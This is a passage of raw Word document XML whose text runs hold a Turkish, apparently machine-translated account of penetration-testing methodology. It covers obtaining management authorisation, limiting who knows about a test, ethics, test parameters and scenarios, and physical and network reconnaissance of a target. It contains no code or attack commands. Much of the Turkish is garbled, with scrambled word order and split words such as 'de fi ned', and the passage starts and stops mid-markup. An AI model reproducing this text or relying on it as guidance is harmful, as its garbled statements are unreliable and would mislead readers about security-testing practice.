        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>organizasyonu ve hedef örgüt arasındaki sözleşmenin bir parçası olarak dahil edilmelidir. Her durumda, testi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>yönetimi böyle onay vermek yetkisine sahip olduğundan emin olun. Penetrasyon testleri bir organizasyonun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>altyapısına saldırıları içermektedir. Bu tip faaliyetler onaylanmış veya açıkça bunu yapmak için yetkisi yok birileri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>üstlenilen edilme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reği, penetrasyon testleri o sistemi veya kuruluşun nüfuz niyetiyle bir sistem veya organizasyon üzerinde</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kullanımını içerir. faaliyetin Bu tip zorunlu olarak, konu organizasyonda birisi test farkında olmasını</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ihtiyacı olanlar, aslında, faaliyet biliyoruz test hakkında bilmek emin olun. Ancak, mutlak minimuma testin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>listesini tutmak. çok fazla insan test hakkında biliyorsanız, hedefin faaliyetleri ve operasyonlar değişmiş</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">bilmeyerek) ve test çaba sonuçlarını inkâr edilebilir. fi t beklentilerine davranış </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>bu değişiklik davranışları</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>edildiğini fark edince çalışanlar Batı Electric'in Hawthorne fabrikasında, bir ünlü çalışmanın adını Hawthornebilin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sırasında, test gerçekleştirecek etkinliklerin çoğu gerçek yaşam saldırganlar sistemlerini nüfu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ynı kişilerdir. Hedef örgütün personel bu faaliyetleri bulursa, onlar (haklı olarak) gerçek bir saldırı için testi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>saldırganı” yakalayabilir. Uygun yönetim personeli test faaliyetlerinin farkında olduğundan emin yaparak,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>meşruiyetini doğrulamak mümkün olac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lınması gereken önemli etik not penetrasyon testleri eylemi kasten güvenlik zayıflıkları belirlemek amacıyla konu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ihlal içerir olmasıdır. Bu, aynı araçları ve gerçek yaşam saldırganlar kullanmak yöntemlerin çoğunu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>test gerektirir. Ancak, gerçek hacker bazen kanuna aykırı veya saldırılarını gerçekleştirmek için son derece</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>davranışlarda. penetrasyon testi güvenlik profesyonel bir şirketin güvenlik prosedürlerini ve sistemlerini atlayarak ve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ihlal arasındaki çizgiyi çizmek bekleniyor. Bu ayrımlar testin başlamasından önce yönetimi ile tartışılan ve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>da yasal sorunlar testin yürütülürken çıkarsa tekrar ele alınmalıdır.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>penetrasyon testi vermeyi kabul edildikten sonra, testin parametreleri kurulmalıdır. test parametreleri test türü</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>belirleyecektir, testlerin amaçları ve test nasıl çalıştırıldığını fi ne de olacaktır işletim sınırları. Birincil karar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>olarak ne belirlemektir. Bu tanımını uzun ( “şirket ağına girmeye yeteneğini test”) geniş bir yelpazedeki son</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XYZ son ürün hakkında teknik bilgi kaybı riskini belirlemek”) yapabilirsiniz. Bu testin başarılı ya da başarısız</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kolay olur Genel olarak, daha fazla özgül test de Tanımlar tercih edilir. tester teknik spesifik fi katyonlarının bir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>üretmek mümkün olup olmadığını İkinci örnekte durumunda, test açıkça başardı. fi ilk örnekte söz konusu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ağ sisteminde logging hareket yapar başarı oluştururlar veya test şebekesinden alınan gerçek veri üretmek</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Böylece, başarı ya da başarısızlık için özgül kriterleri açıkça de fi ned olmalı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planı ve belirlenen bir zaman sınırı olmalıdır. Testin süresi uzunluğu gerçek hasım sistemi girmey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klenebilir süreyi ve aynı zamanda makul ilgili olmalıdır</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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ekibi veya yönetim biri tarafından testinde yerleştirilen herhangi sınırları açıklamalıdır. Takım</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çin istekli olduğunu “hasar” miktarını sınırlamak ahlaki hususlar varsa tester (belki yasal veya sözleşmeye</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>erişmesi yasaktır sistem veya işlemin alanlar varsa, ya da bu açıkça olmalıdır Test planında açıkladı. Yine test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rallara uymayan gerçek yaşam saldırganlar ve saldırganlar gibi davranmaya çalışacaktır. yönetim test belirli</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>etmek istiyorsa, bu açıkça de fi ned olmalıdır. test planı da test sırasında “yakalanma” nin usul ve etkilerini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>koymalıdır. Ne de fi nes “yakalanmadan” ve bu test de planda açıklanmalıdır nasıl etkilediğ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arametreleri Tanımlanmış olmuştur kez test planı test için “senaryo” odaklanmalıdır. senaryo test, test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>şirket içinde üstlenecek pozisyondur. Test Şirket içerisindekiler (çalışanları, yüklenicileri, geçici çalışanlar vs.)</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lirlemek için çalışıyor Örneğin, test şirket içinde geçici iş verilebilir. Test kuruluşa dış tehdit düzey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asarlanmış ise, tester bir pozisyonunu üstlenecek “yabancı.” senaryosu olacak testin genel hedefi ne de de fi.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>şirketin bilgisayar veya tesislerin basit penetrasyon var mı? konu fiziksel veya elektronik saldırılara yoluyla fik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aybından endişe duyduğunu mı? Onların Web sitesine vandalizm endişe ediyorsunuz, Onların elektronik ticaret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dolandırıcılık veya reddi hizmet saldırılarına karşı koruma? Tüm bu faktörler testi senaryosunu belirlenmesin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saldırı planlamak ve yürütmek durması amacıyla son derece önemlidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0055390E"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Yapılması</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tamamlandıktan sonra, test senaryoları kurulmuştur ve test test metodolojisini belirlemiştir, testi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>için zamanı. Birçok yönlerden, bir penetrasyon testi planının icra sonuçlanan askeri bir yürütme il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öyle bir kampanya olarak, üç ayrı fazlar vardır: keşif, saldırı ve (isteğe bağlı olarak) işga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eşif” faz olarak da adlandırılır) keşif aşamasında, test genellikle testin “sahnesini” anket olacaktır. tester fiziksel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lanlıyorsa, keşif aşaması herhangi bir yetersizlik ya da güvenlik açıkları için teklif edilen yeri inceleyerek oluşac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alıştırdığı şekilde fark edilebilir kalıpları için bakmak gerekir. insanlar gelip düzenli aralıklarla gidiyor mu? Korum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ne kadar yakından insanların girip siteden ayrılmadan incelemek mı? onlar normal çalışma saatleri sonrasınd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aha yapın ve düzenli zamanlarda yapılan bu mermi vardır? Farklı zamanlarda işgal sitenin farklı alanlard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birlerini tanımak, ya da birbirlerine yabancı gibi görünüyor yapmak insanlar görünüyorum. fiziki takibin amacı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>olduğunca hedef konumu ile olduğu gibi tamamen aşina olmak ve sitenin davranışlarında tekrarlanabilir kalıpları</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kalıpları anlamak ve onlara karıştırma testinin önemli bir parçası olabilir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">testi ediliyorsa, test mümkün olduğunca hedef çevre hakkında çok fazla bilgi edinmek </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>için keşif aşamasını</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>eşleme ve gözetim bir takım teknikler içerecektir. tester fiziksel olarak hedef konumunu gözlemlemek olama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evrenin elektronik sondalama kullanılmalıdır. tester hedef sistemi veya ağın bir elektronik “harita” geliştirerek</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Nasıl ağ dışarı atılır? Ne ana erişim noktaları vardır ve ne tür donanım ağını yönetiyor? Çeşitli barındıran tanımladımusunuz ve ne çalıştıran işletim sistemleri veya platformlar? Başka hangi ağların da buna bağlanır? çevirmeli ağ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kullanılabilir hizmet mıdır ve dial-out hizmeti dışında almak için kullanı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öznenin çevrenin doğrudan gözetim şeklinde olmak zorunda değildir. Ayrıca daha dolaylı diğer yollarl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Örneğin, konu hakkında bilgi edinmek için bazı iyi yerlerdir:da hoşnutsuz çalışanlar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bilgisayar gösterileri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
